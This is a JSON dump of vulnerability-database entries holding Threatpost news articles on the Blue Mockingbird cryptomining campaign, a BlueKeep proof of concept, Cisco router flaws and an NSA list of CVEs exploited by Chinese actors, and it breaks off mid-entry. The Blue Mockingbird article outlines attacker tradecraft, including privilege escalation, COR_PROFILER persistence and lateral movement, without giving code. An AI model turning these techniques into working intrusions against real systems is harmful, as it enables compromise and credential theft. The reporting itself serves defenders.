Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-0708"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "description": "A high-severity bug has been found that allows remote attackers to hijack Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOne Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n\n**_Ransomware is on the rise: _****_[Don\u2019t miss our free Threatpost webinar ](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)_****_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost_****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-06T17:43:57", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "modified": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-06T16:33:36", "description": "A critical security vulnerability in a subset of Cisco Systems\u2019 small-business VPN routers could allow a remote, unauthenticated attacker to take over a device \u2013 and researchers said there are at least 8,800 vulnerable systems open to compromise.\n\nCisco addressed the bugs (CVE-2021-1609) as part of a slew of patches rolled out this week. In total, the fixes and affected products are as follows:\n\n * Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Web Management Vulnerabilities ([advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy>))\n * Cisco Small Business RV160 and RV260 Series VPN Routers Remote Command Execution Vulnerability ([advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-code-execution-9UVJr7k4>))\n * Cisco Packet Tracer for Windows DLL Injection Vulnerability ([advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-packettracer-dll-inj-Qv8Mk5Jx>))\n * Cisco Network Services Orchestrator CLI Secure Shell Server Privilege Escalation Vulnerability ([advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-priv-esc-XXqRtTfT>))\n * ConfD CLI Secure Shell Server Privilege Escalation Vulnerability ([advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-confd-priv-esc-LsGtCRx4>))\n\n## **Critical RCE Security Bug in Gigabit VPN Routers**\n\nThe critical bug affects the vendor\u2019s Dual WAN Gigabit VPN routers. According to the advisory, CVE-2021-1609 exists in the web management interface for the devices, and carries a CVSSv3 vulnerability-severity score of 9.8. It arises due to improper validation of HTTP requests.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAccording to [a Thursday analysis](<https://www.tenable.com/blog/cve-2021-1609-critical-rce-vulnerability-cisco-small-business-vpn-routers>) from Tenable, a remote, unauthenticated attacker could thus exploit the vulnerability by sending a specially crafted HTTP request to a vulnerable device, \u201cresulting in arbitrary code-execution as well as the ability to reload the device, resulting in a denial of service (DoS).\u201d\n\nRemote management of these devices is disabled by default according to Cisco, which would thwart such attacks. However, researchers at Tenable found that more than 8,800 devices are publicly accessible and vulnerable to exploit.\n\nMeanwhile, a second bug affecting the same devices, CVE-2021-1610, is a high-rated command-injection vulnerability in the same web management interface.\n\n\u201cWhile both flaws exist due to improper validation of HTTP requests and can be exploited by sending specially crafted HTTP requests, CVE-2021-1610 can only be exploited by an authenticated attacker with root privileges,\u201d according to Tenable. \u201cSuccessful exploitation would grant an attacker the ability to gain arbitrary command execution on the vulnerable device\u2019s operating system.\u201d\n\nThe web management interface for its small business VPN routers is available by default through local area network connections and can\u2019t be disabled, Cisco noted, adding that that some versions of the router software may only be affected by one of the two vulnerabilities.\n\nThough no in-the-wild exploitation has been seen thus far for the bugs, Tenable warned that this is likely to change.\n\n\u201cIn January 2019, Cisco published advisories for two different vulnerabilities in its RV320 and RV325 WAN VPN routers,\u201d according to the analysis. \u201cA few days after the advisories were published, proof-of-concept exploit scripts for these flaws were published, which was followed by active scanning for vulnerable devices. Because of this historical precedent, we believe it is important that organizations patch these latest vulnerabilities as soon as possible.\u201d\n\nIf patching isn\u2019t possible, users should make sure that remote web management is disabled, the firm added.\n\n## **High-Severity Cisco Security Bugs**\n\nCisco also addressed several high-severity bugs, with severity ratings ranging between 8.8 and 7.8 on the CVSSv3 scale.\n\nThe bug tracked as CVE-2021-1602 exists in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers \u2013 if exploited, it could allow an unauthenticated, remote attacker to execute arbitrary commands using root-level privileges, on the underlying operating system.\n\nLike the Gigabit VPN router issues, the vulnerability is due to insufficient user input validation, and an attacker could exploit it by sending a crafted request to the web-based management interface. However, a mitigating factor is the fact that only commands without parameters can be executed, according to Cisco.\n\nMeanwhile, a vulnerability in Cisco Packet Tracer for Windows (CVE-2021-1593) could allow an authenticated, local attacker to perform a DLL injection attack on an affected device. An attacker must have valid credentials on the Windows system in order to be successful, according to the advisory.\n\n\u201cThis vulnerability is due to incorrect handling of directory paths at run time,\u201d Cisco explained. \u201cAn attacker could exploit this vulnerability by inserting a configuration file in a specific path on the system, which can cause a malicious DLL file to be loaded when the application starts. A successful exploit could allow an attacker with normal user privileges to execute arbitrary code on the affected system with the privileges of another user\u2019s account.\u201d\n\nThe last high-severity security issue is tracked as CVE-2021-1572, and it affects both the Cisco Network Services Orchestrator (NSO) and ConfD options for the CLI Secure Shell (SSH) Server. It\u2019s a privilege-escalation bug that could allow an authenticated, local attacker to execute arbitrary commands at the level of the account under which the service is running, which is commonly root.\n\nTo exploit the vulnerability, an attacker must have a valid account on an affected device.\n\n\u201cThe vulnerability exists because the affected software incorrectly runs the SFTP user service at the privilege level of the account that was running when the built-in SSH server for CLI was enabled,\u201d according to Cisco. \u201cAn attacker with low-level privileges could exploit this vulnerability by authenticating to an affected device and issuing a series of commands at the SFTP interface.\u201d\n\nAny user who can authenticate to the built-in SSH server could exploit the bug, the vendor warned.\n\nSince Cisco bugs [are popular with cyberattackers](<https://threatpost.com/cisco-asa-bug-exploited-poc/167274/>), users should update to the latest versions of the affected products (patches available via links above).\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. ****[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) ****for our upcoming live webinar, ****[How to Think Like a Threat Actor](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)****, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this ****[LIVE](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**** discussion.**\n", "cvss3": {}, "published": "2021-08-06T16:07:55", "type": "threatpost", "title": "Critical Cisco Bug in VPN Routers Allows Remote Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1572", "CVE-2021-1593", "CVE-2021-1602", "CVE-2021-1609", "CVE-2021-1610"], "modified": "2021-08-06T16:07:55", "id": "THREATPOST:8EA8D0065DFF8156E96B2791BA08EF85", "href": "https://threatpost.com/critical-cisco-bug-vpn-routers/168449/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-13T15:22:34", "description": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters: flag, frame, func, and Nfunc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": 